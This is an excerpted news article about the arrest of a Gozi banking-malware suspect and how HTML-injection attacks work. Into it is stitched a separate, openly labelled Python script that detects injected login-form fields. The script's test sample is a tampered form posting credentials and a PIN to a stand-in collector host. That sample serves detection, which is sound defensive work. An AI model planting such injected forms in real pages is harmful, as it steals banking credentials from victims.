
Colombian police arrest Gozi malware suspect after 8 years at large
2021-06-30 20:19

The troika was wanted for allegedly operating a bank-raiding crimeware "Service" known as Gozi, based on zombie malware that used a technique known as HTML injection to trick victims into revealing personal information relating to their on-line banking.

But if you can plant malware on the victim's PC, you can use what's known as an MiTB attack, or "Manipulator in the browser".

Only then do you inject content into the HTML in order to modify the form, for example to request additional security information that wouldn't normally be needed at that point.

Finally, you exfiltrate the extra data entered by the victim by sending it somewhere other than the bank.
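The three steps above (modified form, extra field, exfiltration to a third party) leave traces a bank can look for. As an added example that is not from the article, this script compares the login form the bank served with the form as the browser actually rendered it, flagging input fields absent from the baseline and any form whose action points away from the bank's own host. The HTML snippets and the host names are constructed for illustration.

```python
"""Detect HTML-injection tampering of a banking login form (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

BANK_HOST = "online.examplebank.test"  # constructed placeholder for the bank's origin


class FormScanner(HTMLParser):
    """Collects the action of every <form> and the name of every <input>."""

    def __init__(self):
        super().__init__()
        self.actions = []   # action attribute of each <form>, in document order
        self.inputs = set()  # name attribute of each named <input>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("name"):
            self.inputs.add(a["name"])


def scan(html):
    parser = FormScanner()
    parser.feed(html)
    return parser


def find_injections(baseline_html, rendered_html):
    """Return (injected_field_names, foreign_form_actions).

    Fields present in the rendered page but not in the bank's baseline are the
    'additional security information' an inject asks for; a form action whose
    host is not the bank's is the exfiltration path.
    """
    base, seen = scan(baseline_html), scan(rendered_html)
    injected = sorted(seen.inputs - base.inputs)
    foreign = []
    for action in seen.actions:
        host = urlparse(action).hostname  # relative actions like "/login" have no host
        if host and host != BANK_HOST:
            foreign.append(action)
    return injected, foreign


# Constructed sample: the form as the bank served it ...
BASELINE = """<form action="/login" method="post">
<input name="username"><input type="password" name="password"></form>"""
# ... and the same form after an inject added a field and redirected the post.
RENDERED = """<form action="https://collector.invalid/post" method="post">
<input name="username"><input type="password" name="password">
<input name="card_pin"></form>"""

if __name__ == "__main__":
    print(find_injections(BASELINE, RENDERED))
```

Because the malware controls the browser, a check like this is only trustworthy when the rendered DOM is captured and compared server-side; client-side scripts can be suppressed by the same inject.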

Using the stolen data, the Gozi crooks could then raid the victim's bank account, with the US Department of Justice noting at the time that there were at least 17,000 Gozi malware infections in the US alone, including 160 at NASA. It seems that rocket scientists aren't of interest to cybercrooks only for the latest spaceplane plans; their bank account details are valuable, too.

Kuzmin was said to have been what you might call the COO of the "Business", hiring coders to write the Gozi malware and operating the Crimeware-as-a-Service business based around it.


News URL

https://nakedsecurity.sophos.com/2021/06/30/colombian-police-arrest-gozi-malware-suspect-after-8-years-at-large/